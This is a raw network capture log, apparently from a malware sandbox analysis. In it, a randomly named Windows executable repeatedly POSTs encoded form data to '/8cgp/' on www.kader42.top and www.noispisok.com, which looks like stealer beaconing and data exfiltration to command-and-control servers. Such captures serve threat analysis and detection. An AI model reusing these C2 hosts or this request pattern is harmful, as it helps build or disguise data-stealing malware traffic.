                                                                    Apr 24, 2024 12:28:52.193205118 CEST474INData Raw: 31 64 33 0d 0a a5 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 6b d3 e1 10 eb 89 e1 36 c4 e0 38 6e e2 c3 89 8d fd d2 b4 45 37 30 f0 6b 40 b0 9e 74 2c 48 48 0c 0c 2c e8 10 0c fc 35 a9 d4 89 7f 01 a7 09 77 3d 04 13 96 6c cb f6 fb be f7 7d ef
                                                                    Data Ascii: 1d3R0WX^Hk68nE70k@t,HH,5w=l}J\s@i4MxL]Bo[i`i^HWOdJx0-0\$WF`SA,v&:I (~ ?]
                                                                    Apr 24, 2024 12:28:52.193216085 CEST13INData Raw: 38 0d 0a d1 4b 89 0e 21 03 00 00 0d 0a
                                                                    Data Ascii: 8K!
                                                                    Apr 24, 2024 12:28:52.193227053 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.11.2050251108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:54.724514961 CEST996OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 65 70 2b 6f 6c 39 5a 39 2f 59 33 51 4d 6a 64 2f 44 4e 78 44 4a 47 2b 50 38 58 66 6e 63 78 57 56 37 48 36 6e 6a 44 4b 44 37 6b 4e 33 75 4f 31 6b 61 61 73 45 2f 55 50 61 68 73 65 73 75 43 55 2b 37 30 6c 6a 69 4f 54 54 4c 4b 73 46 50 35 4b 4f 44 62 48 38 6a 42 4b 62 6e 53 4a 49 71 49 48 72 75 33 6b 6a 71 46 52 55 77 4a 52 64 49 53 47 75 6a 38 6c 32 63 32 78 31 4d 32 65 58 4f 46 52 5a 43 57 48 65 64 59 57 62 68 43 7a 74 69 4d 32 6c 54 67 76 32 4c 67 32 77 6d 78 2f 35 64 62 52 64 45 62 66 73 6e 65 43 35 63 30 46 70 6d 6d 37 44 67 49 41 64 73 31 45 67 4c 31 50 65 58 42 41 6a 52 4b 46 48 6a 4b 54 4e 4b 4f 71 75 4d 4a 56 6a 62 71 55 78 50 71 75 61 69 4d 2f 41 79 68 76 32 2f 34 7a 57 64 35 73 37 4f 65 78 53 4e 48 32 57 41 64 46 4a 42 4a 50 34 58 70 70 39 58 55 4d 70 66 64 67 55 6f 32 55 4a 61 78 56 45 7a 37 74 6b 75 48 54 56 5a 47 49 48 54 41 30 53 52 51 35 6b 4e 61 51 47 78 4b 78 49 77 52 74 6e 43 50 31 75 78 67 5a 73 51 64 44 46 51 6e 67 63 46 48 37 45 50 48 67 49 67 31 47 4f 45 48 70 39 33 41 55 37 6c 33 79 69 7a 79 53 4a 6a 56 65 55 42 64 4b 6b 32 6d 6c 59 53 57 4f 31 6c 6b 49 73 79 77 37 4a 62 33 4f 48 35 78 54 31 4d 70 76 47 6e 38 6b 68 59 67 50 52 46 47 53 55 77 33 6e 52 6e 45 33 4b 52 35 73 52 50 35 57 4a 6a 2b 7a 34 42 4a 63 47 43 45 34 32 68 4b 6d 35 44 4d 54 38 6b 31 6d 77 42 50 78 76 76 67 77 6b 37 6e 77 4e 5a 46 66 6f 77 77 37 31 51 78 50 6e 75 57 4f 50 54 4c 4d 74 6e 4a 34 72 48 30 51 6d 34 6b 6f 53 4c 73 7a 45 54 4f 4d 34 44 63 65 77 7a 53 2f 4a 77 51 69 6a 4d 68 37 45 6e 47 57 41 42 32 47 6f 41 6f 4d 37 44 6c 32 5a 6c 4d 64 46 73 50 4a 79 45 45 65 58 4f 2b 72 59 79 4a 67 3d
                                                                    Data Ascii: Xh9lX=ep+ol9Z9/Y3QMjd/DNxDJG+P8XfncxWV7H6njDKD7kN3uO1kaasE/UPahsesuCU+70ljiOTTLKsFP5KODbH8jBKbnSJIqIHru3kjqFRUwJRdISGuj8l2c2x1M2eXOFRZCWHedYWbhCztiM2lTgv2Lg2wmx/5dbRdEbfsneC5c0Fpmm7DgIAds1EgL1PeXBAjRKFHjKTNKOquMJVjbqUxPquaiM/Ayhv2/4zWd5s7OexSNH2WAdFJBJP4Xpp9XUMpfdgUo2UJaxVEz7tkuHTVZGIHTA0SRQ5kNaQGxKxIwRtnCP1uxgZsQdDFQngcFH7EPHgIg1GOEHp93AU7l3yizySJjVeUBdKk2mlYSWO1lkIsyw7Jb3OH5xT1MpvGn8khYgPRFGSUw3nRnE3KR5sRP5WJj+z4BJcGCE42hKm5DMT8k1mwBPxvvgwk7nwNZFfoww71QxPnuWOPTLMtnJ4rH0Qm4koSLszETOM4DcewzS/JwQijMh7EnGWAB2GoAoM7Dl2ZlMdFsPJyEEeXO+rYyJg=
                                                                    Apr 24, 2024 12:28:54.902451992 CEST240INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:28:53 GMT
                                                                    Connection: close
                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                    Data Ascii: a
                                                                    Apr 24, 2024 12:28:54.902565956 CEST474INData Raw: 31 64 33 0d 0a a5 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 6b d3 e1 10 eb 89 e1 36 c4 e0 38 6e e2 c3 89 8d fd d2 b4 45 37 30 f0 6b 40 b0 9e 74 2c 48 48 0c 0c 2c e8 10 0c fc 35 a9 d4 89 7f 01 a7 09 77 3d 04 13 96 6c cb f6 fb be f7 7d ef
                                                                    Data Ascii: 1d3R0WX^Hk68nE70k@t,HH,5w=l}J\s@i4MxL]Bo[i`i^HWOdJx0-0\$WF`SA,v&:I (~ ?]
                                                                    Apr 24, 2024 12:28:54.902575016 CEST13INData Raw: 38 0d 0a d1 4b 89 0e 21 03 00 00 0d 0a
                                                                    Data Ascii: 8K!
                                                                    Apr 24, 2024 12:28:54.902584076 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.11.2050252108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:57.424940109 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 65 70 2b 6f 6c 39 5a 39 2f 59 33 51 4d 6a 64 2f 44 4e 78 44 4a 47 2b 50 38 58 66 6e 63 78 57 56 37 48 36 6e 6a 44 4b 44 37 6b 46 33 75 38 74 6b 49 35 45 45 35 6b 50 61 36 73 65 68 75 43 55 5a 37 33 56 6e 69 4f 76 44 4c 49 55 46 50 71 79 4f 44 75 54 38 31 52 4b 57 6f 79 4a 4b 75 49 47 71 75 33 67 4e 71 46 55 32 77 61 4e 64 50 51 75 75 6b 4c 52 31 55 47 78 33 4d 32 65 4c 59 31 52 2f 43 57 4c 4f 64 59 71 62 68 42 48 74 7a 75 4f 6c 56 78 76 32 54 41 32 7a 31 52 2f 69 55 37 52 38 45 62 4b 56 6e 65 43 44 63 32 70 70 6d 6b 6a 44 6a 50 63 53 74 56 45 67 42 56 50 66 54 42 38 6e 52 4b 59 59 6a 4b 33 4e 4b 4a 57 75 4d 70 56 6a 4f 2f 67 79 59 36 75 59 6d 4d 2f 58 6b 68 7a 2b 2f 34 50 43 64 34 49 37 4f 75 31 53 50 30 65 57 51 50 39 4a 66 35 50 36 5a 4a 70 55 64 30 4d 31 66 5a 4d 69 6f 33 31 38 61 78 68 45 79 65 52 6b 6b 46 37 57 50 32 49 64 5a 67 30 48 61 77 6c 34 4e 5a 70 45 78 4b 78 6d 77 56 64 6e 43 63 74 75 79 6b 4e 72 54 4e 44 43 59 48 67 4e 65 58 2f 30 50 44 34 2b 67 31 2f 4c 45 41 78 39 78 67 55 37 67 51 75 6a 6f 53 53 4b 38 6c 65 4b 65 4e 4b 4b 32 6d 70 75 53 58 62 4f 6c 33 38 73 7a 41 4c 4a 4d 58 4f 45 7a 78 54 78 58 5a 76 36 78 4d 6b 68 59 67 79 67 46 47 65 55 77 69 44 52 6e 30 6e 4b 42 36 45 52 43 5a 57 4c 6a 2b 79 67 42 4a 51 31 43 43 68 58 68 4a 2b 54 44 4b 44 38 6b 6b 32 77 41 4f 78 6f 71 51 77 68 73 48 77 61 57 6c 62 46 77 77 6e 39 51 78 2b 53 74 6d 69 50 53 4b 77 74 6a 4a 35 39 52 45 52 50 79 45 70 4a 50 73 50 49 54 4f 51 6f 44 64 36 67 7a 51 2f 4a 77 55 44 44 64 68 7a 45 2f 6b 4b 4e 4b 32 79 2f 4a 59 46 76 4d 54 53 38 75 4e 39 4b 6a 37 64 4c 61 48 65 48 5a 66 44 35 75 5a 59 4c 76 75 37 33 6a 72 66 35 39 4b 50 37 4d 39 31 72 65 69 77 57 56 52 37 49 32 70 55 69 52 4b 74 2b 4b 32 51 48 39 72 59 63 53 69 6b 75 32 69 2b 6a 43 32 4d 57 6f 41 77 36 49 79 47 73 61 43 4e 45 61 6c 4b 4e 63 35 33 54 59 6e 62 4a 7a 41 38 48 53 35 59 6a 34 49 4f 52 55 34 6d 47 32 41 2b 50 61 66 70 55 32 78 35 47 36 7a 6b 64 4b 39 53 68 70 57 78 2f 4f 34 64 73 2f 6b 69 38 61 7a 35 5a 51 69 5a 42 31 65 59 45 49 42 62 6d 74 37 53 58 54 35 74 49 30 69 35 4d 4f 6c 69 2b 41 56 53 31 30 38 59 77 54 51 50 36 56 37 61 42 64 5a 57 72 55 49 31 68 75 2b 50 42 48 4e 44 4b 4a 31 45 2f 72 59 59 38 6e 69 4b 39 54 63 6d 51 54 68 75 69 33 4a 48 55 37 4a 59 39 4f 38 44 6c 39 48 76 68 65 48 71 66 2f 71 61 2f 38 77 4e 4f 64 39 68 4d 4c 73 50 4e 51 55 5a 79 2b 71 63 6f 7a 66 2f 34 68 70 77 45 59 62 61 45 5a 35 6d 31 68 53 32 33 79 6f 38 36 2f 74 68 39 51 62 61 58 53 6b 57 4b 54 53 58 53 75 2f 54 34 73 4d 47 4f 77 62 37 69 6d 58 74 51 75 35 43 30 6f 57 4c 33 75 33 76 63 6f 68 35 47 33 50 39 78 52 63 7a 75 6c 2b 37 6b 59 33 6e 52 49 58 4a 54 6b 78 63 4f 4f 43 79 51 6a 38 69 4c 6c 68 6f 70 6b 57 54 47 53 70 4f 69 52 4e 70 67 39 56 76 51 6f 65 6f 70 4c 5a 6b 47 39 57 79 35 46 6b 33 4d 63 66 47 32 4a 39 79 44 2f 7a 57 77 2f 59 54 31 58 77 57 42 72 72 37 58 4a 30 47 71 78 38 41 6d 4b 76 32 71 6e 4b 68 79 44 6b 50 38 73 47 55 6c 58 64 2f 6e 48 68 35 30 66 74 32 65 67 38 7a 66 4a 6f 6a 63 6a 52 62 6e 64 70 63 42 6e 68 6f 51 52 43 77 74 71 68 65 41 56 30 6a 49 65 38 56 4e 50 6c 34 63 69 56 39 41 63 30 65 63 47 2f 69 34 2f 31 71 2f 77 30 6c 2f 66 47 4d 43 43 44 32 56 76 37 67 61 30 33 63 6c 4e 49 69 36 56 73 5a 4e 58 63 42 35 44 2b 44 6b 2b 6c 38 65 53 48 79 7a 63 59 44 4e 6b 41 6e 6d 57 51 4c 33 4b 6e 48 66 7a 2b 71 59 6c 39 62 78 55 6e 76 61 6a 55 70 4f 73 31 54 46 50 41 50 66 73 64 44 4b 54 67 4f 6f 4e 76 7a 51 2f 51 30 32 6b 51 6e 63 51 2b 67 50 4f 4f 61 6a 49 31 57 49 4d 74 4d 41 54 48 55 49 47 4e 78 34 34 6e 4a 52 72 73 48 4c 44 73 33 41 77 43 54 70 55 35 37 47 4e 4a 71 4e 6d 65 75 41 50 7a 69 72 6d 43 43 41 5a 2b 34 79 75 46 45 43 33 32 36 62 68 55 6c 38 47 78 6f 79 4e 61 44 6d 7a 76 79 57 56 6c 64 57 30 7a 69 35 44 68 4d 54 65 2b 50 45 64 4b 56 48 78 5a 55 70 50 38 71 52 73 75 4a 47 53 63 4e 4d 4e 5a 30 79 67 62 36 44 49 6e 41 4f 47 35 4a 6a 45 71 54 47 78 78 75 55 62 37 63 43 4d 48 63 34 72 46 65 53 49 6b 49 74 2b 51 58 49 76 79 58 43 6d 6f 68 4a 71 43 35 73 57 6e 39 74 30 41 35 79 41 65 76 6c 74 6a 65 6e 71 50 50 76 45 4f 33 69 46 47 6f 41 48
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:28:57.424998999 CEST5156OUTData Raw: 47 63 55 4f 54 36 6c 43 37 4d 70 4b 56 5a 77 47 77 53 39 36 77 68 33 39 35 6e 65 36 31 49 52 75 4a 4a 4c 34 47 6a 2f 6b 6c 44 54 4c 57 58 77 38 6a 2b 76 7a 77 62 59 4d 49 35 4d 66 49 43 6a 6f 36 32 38 62 47 59 78 45 44 65 79 55 51 30 64 36 55 2b
                                                                    Data Ascii: GcUOT6lC7MpKVZwGwS96wh395ne61IRuJJL4Gj/klDTLWXw8j+vzwbYMI5MfICjo628bGYxEDeyUQ0d6U+5uENirj1WjruqKG6kwxsTf8gqIEeAkqizTG+KkTb7XZbWOKgaYbzviX/VgYVdnilGR8z80emtzkR1SsgDaEYF9m4Wp1gciuGjoiB0BDaT4pDKcfTWN9admPGBbapJ9BX2zXcqe7KnV11qNVMS7cA4g0GlVEjT19b5
                                                                    Apr 24, 2024 12:28:57.425057888 CEST5156OUTData Raw: 72 32 4b 56 63 64 55 33 67 4b 59 50 70 7a 34 46 38 66 6c 78 2b 41 75 65 63 6c 52 4c 45 47 58 6d 6e 4c 58 73 70 43 4a 33 75 56 51 61 34 59 42 45 45 4b 63 6e 4f 56 6a 56 37 74 30 7a 43 6f 46 65 71 68 72 33 67 5a 38 79 35 53 56 73 55 75 36 34 5a 68
                                                                    Data Ascii: r2KVcdU3gKYPpz4F8flx+AueclRLEGXmnLXspCJ3uVQa4YBEEKcnOVjV7t0zCoFeqhr3gZ8y5SVsUu64Zh9dfaxrUFLV9i2r456ovmSJJCCoHMGEgOzNUkNiCb3kAA5y9kLcWHhr2tVeJ4v4uS8y95QwyrH25wrgv2DiEqIlvOEYfwFhJIig48of2zTyvLOkbMnD0XNwfkQcdBVO4+5aywHQYv6fqK61Yr8jsu0pYtPZccJDgBB
                                                                    Apr 24, 2024 12:28:57.599211931 CEST2578OUTData Raw: 68 37 45 74 7a 46 34 56 54 6d 65 32 61 72 74 36 75 32 4e 6a 2f 37 46 77 6e 62 6b 65 47 57 38 35 61 31 70 7a 69 57 4e 67 6a 62 50 75 32 42 65 53 58 74 55 76 4b 52 38 36 6d 75 53 50 2b 61 34 74 69 45 36 68 4a 70 53 6b 54 37 4f 76 33 46 48 45 55 55
                                                                    Data Ascii: h7EtzF4VTme2art6u2Nj/7FwnbkeGW85a1pziWNgjbPu2BeSXtUvKR86muSP+a4tiE6hJpSkT7Ov3FHEUUsghN4RU5lN89/11+lCKjy/Ae4cadQmlj3bO/XnfHUjGBVFPR1g22p9+7dQM5iTNQdGUZq33o6WjGPcmOCuQz3lgRnlTEL/jtCeM203Q/kKNQs17tz5Yiw2td9Z7dMPj2pnl+Lc+zh0ZK2HEcdfJIC9tkqci9p5KGR
                                                                    Apr 24, 2024 12:28:57.599260092 CEST2578OUTData Raw: 57 54 37 43 39 36 48 54 45 6b 44 68 65 38 67 62 72 51 66 54 31 33 38 30 4e 36 55 45 35 74 35 73 78 32 36 63 54 4c 52 77 35 42 68 45 50 43 51 37 30 39 79 32 69 54 6a 74 42 4d 66 66 6d 72 68 75 51 39 6b 6a 67 59 6a 2b 6b 4b 7a 42 70 61 72 36 4d 37
                                                                    Data Ascii: WT7C96HTEkDhe8gbrQfT1380N6UE5t5sx26cTLRw5BhEPCQ709y2iTjtBMffmrhuQ9kjgYj+kKzBpar6M7MPWAIM4hXNKjo6VfRgw3GTLolwDR/fcs9n2uw8a0Q15fFLttRiVaJlGSrtBopSbPthmqaeVEbmhKB4ub8Y+Sw3QOmzO/3u724W6uW1D9WQ3AIQwIzNoOcXPQiT+7SYFFg0jxt0zYwwtNsJ1sZqBjo/JrdfUssmf5T
                                                                    Apr 24, 2024 12:28:57.599301100 CEST1289OUTData Raw: 2b 63 51 6e 4f 48 72 6c 6e 6b 69 76 51 6c 6f 51 32 4a 6a 47 6f 6f 6e 4f 63 48 7a 4e 2b 35 74 31 63 59 42 79 49 74 69 71 59 62 72 4e 58 4f 31 75 55 78 63 62 66 73 2b 51 33 6d 78 49 55 5a 67 4d 5a 49 61 37 52 44 49 6c 36 4c 39 7a 38 4e 67 6d 53 42
                                                                    Data Ascii: +cQnOHrlnkivQloQ2JjGoonOcHzN+5t1cYByItiqYbrNXO1uUxcbfs+Q3mxIUZgMZIa7RDIl6L9z8NgmSBl6zPCv+3xGMEVTLzNxiwHQybD4tz+QUaAASD/cWW2GWvQr5icm6x9EszT120516eVBXJzZ+dwauBm8c89sRgsrhR/mc1Qc0SdVKb/hYeS6wnjb2l4feToNvhsEo7CP4q9OUPZJdKcy7SoEn93Xd1PHO5IdWlli6rK
                                                                    Apr 24, 2024 12:28:57.599489927 CEST19335OUTData Raw: 77 2f 78 79 32 4b 39 2f 50 48 76 54 33 39 4f 77 4a 38 4d 2f 4a 63 64 75 76 6f 54 45 65 4b 75 41 79 70 7a 4e 68 56 66 34 31 31 52 65 34 4c 54 37 57 56 50 73 47 2b 4f 44 4c 6e 6f 57 4a 39 71 5a 72 58 34 35 46 32 66 4d 4b 59 4e 39 6e 73 5a 72 62 52
                                                                    Data Ascii: w/xy2K9/PHvT39OwJ8M/JcduvoTEeKuAypzNhVf411Re4LT7WVPsG+ODLnoWJ9qZrX45F2fMKYN9nsZrbRdK7AdqK1F0MIW73XYvUXu2Uz4A/OoTTpXN0rqNeMLb6xBOlfkVDnlAmtbIO60CvgYwh5g9OZSvV3BgCSL8U/nDRPfgYFLY8szY+atRpPWqvr6apHSQUKxTk3csse+gK1aMB4i13BaoXawGxktPa+lryRO+SY/HSPw
                                                                    Apr 24, 2024 12:28:57.599994898 CEST240INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:28:57 GMT
                                                                    Connection: close
                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                    Data Ascii: a
                                                                    Apr 24, 2024 12:28:57.600004911 CEST474INData Raw: 31 64 33 0d 0a a5 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 6b d3 e1 10 eb 89 e1 36 c4 e0 38 6e e2 c3 89 8d fd d2 b4 45 37 30 f0 6b 40 b0 9e 74 2c 48 48 0c 0c 2c e8 10 0c fc 35 a9 d4 89 7f 01 a7 09 77 3d 04 13 96 6c cb f6 fb be f7 7d ef
                                                                    Data Ascii: 1d3R0WX^Hk68nE70k@t,HH,5w=l}J\s@i4MxL]Bo[i`i^HWOdJx0-0\$WF`SA,v&:I (~ ?]
                                                                    Apr 24, 2024 12:28:57.600013018 CEST13INData Raw: 38 0d 0a d1 4b 89 0e 21 03 00 00 0d 0a
                                                                    Data Ascii: 8K!
                                                                    Apr 24, 2024 12:28:57.600022078 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0
                                                                    Apr 24, 2024 12:28:57.773420095 CEST2578OUTData Raw: 66 54 57 45 4a 7a 68 68 2b 61 4d 6e 4e 55 47 75 6a 36 35 34 63 41 31 4c 4d 31 7a 62 6d 70 61 38 53 75 53 64 6e 4e 4f 38 76 2f 53 35 75 76 4c 54 39 2b 75 4f 59 78 70 56 74 6f 39 5a 30 47 6e 6f 78 51 2b 68 39 6f 49 70 61 64 61 41 62 4e 2f 39 33 72
                                                                    Data Ascii: fTWEJzhh+aMnNUGuj654cA1LM1zbmpa8SuSdnNO8v/S5uvLT9+uOYxpVto9Z0GnoxQ+h9oIpadaAbN/93rT9cQCozfVqIuuTvbHRyE0JQW7/UhFI01ntRXP2fd9Ufmfyra6OawouY104wmbWgBKKUmhrZX7pkde1NeQk+T2maupdb2s8U59uvgKwMJZ7mLP2S8yfW/OFB7yft/GlCInE/80AVZMjalJksfyx5m6KgiPVj/CX5OR


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.11.2050253108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:00.127063036 CEST388OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kader42.top
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:00.302531004 CEST209INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:00 GMT
                                                                    Connection: close
                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                    Data Ascii: 3
                                                                    Apr 24, 2024 12:29:00.302635908 CEST805INData Raw: 33 31 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e5 a8
                                                                    Data Ascii: 31e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.c
                                                                    Apr 24, 2024 12:29:00.302645922 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.11.205025484.32.84.32807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:05.871361017 CEST662OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
